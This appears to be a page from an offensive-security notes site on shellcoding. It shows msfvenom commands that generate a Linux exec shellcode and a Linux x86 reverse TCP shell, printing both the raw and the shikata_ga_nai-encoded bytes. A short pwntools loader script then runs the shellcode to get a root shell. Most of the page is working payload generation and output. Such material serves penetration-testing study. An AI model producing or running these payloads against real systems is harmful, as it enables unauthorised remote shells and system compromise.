SHELLCODING

LISTING PAYLOADS/SHELLCODES

root@oco:~$ msfvenom -l payloads | grep 'linux/x64'
 linux/x64/exec                                      Execute an arbitrary command
 ...SNIP...
 
 * the linux/x64/exec payload allows for the execution of a specified command on the 
   target system when the payload is run.

GENERATING SHELLCODE

Before generating shellcode, it is essential to ensure that it matches the target system in several key areas. First, the architecture must correspond to the CPU type and instruction set of the target, such as x86, x86_64, or ARM, because shellcode is raw machine code and will not execute correctly on a mismatched architecture. Second, the platform must match the target operating system, such as Linux, Windows, or macOS, since system calls and API interfaces differ between OSes and shellcode is typically written to interact directly with these interfaces. Third, attention must be paid to bad characters, which are bytes that cannot appear in the shellcode because they may terminate strings, corrupt memory, or break input parsing; common examples include null bytes (\x00), carriage returns (\x0d), and newlines (\x0a). Ensuring alignment across these three areas—architecture, platform, and bad characters—is crucial for creating functional and reliable shellcode.

SYSCALL: EXEC

root@oco:~$ msfvenom -p 'linux/x64/exec' CMD='sh' -a 'x64' --platform 'linux' -f 'hex'
 No encoder specified, outputting raw payload
 Payload size: 48 bytes
 Final size of hex file: 96 bytes
 6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e80300000073680056574889e60f05
 
 * this shellcode is not as optimized and short as a manually generated shellcode

REVERSE SHELL SHELLCODE (LINUX)

UNSAFE:

This version doesn't have bad-character filtering.

root@oco:~$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c
 No encoder specified, outputting raw payload
 Payload size: 68 bytes
 Final size of c file: 311 bytes
 unsigned char buf[] = 
 "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
 "\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00"
 "\x01\x68\x02\x00\x7a\x69\x89\xe1\xb0\x66\x50\x51\x53\xb3"
 "\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
 "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

SAFE:

This version has bad-character filtering

//SYNTAX
msfvenom -p linux/x86/shell_reverse_tcp lhost=<LHOST> lport=<LPORT> --format c --arch x86 --platform linux --bad-chars "<chars>" --out <filename>

root@oco:~$ msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode
 Found 11 compatible encoders
 Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
 x86/shikata_ga_nai succeeded with size 95 (iteration=0)
 x86/shikata_ga_nai chosen with final size 95
 Payload size: 95 bytes
 Final size of c file: 425 bytes
 Saved as: shellcode

root@oco:~$ cat shellcode
 unsigned char buf[] = 
 "\xda\xca\xba\xe4\x11\xd4\x5d\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
 "\x12\x31\x50\x17\x03\x50\x17\x83\x24\x15\x36\xa8\x95\xcd\x41"
 "\xb0\x86\xb2\xfe\x5d\x2a\xbc\xe0\x12\x4c\x73\x62\xc1\xc9\x3b"
 <SNIP>

TESTING: RUNNING SHELLCODES

root@sre:~$ nano loader.py
 #!/usr/bin/python3

 import sys
 from pwn import *

 context(os="linux", arch="amd64", log_level="error")

 run_shellcode(unhex(sys.argv[1])).interactive()

root@oco:~$ python3 loader.py '6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e80300000073680056574889e60f05'
 $ whoami
    root
PreviousMSFVENOMNextENCODING

Last updated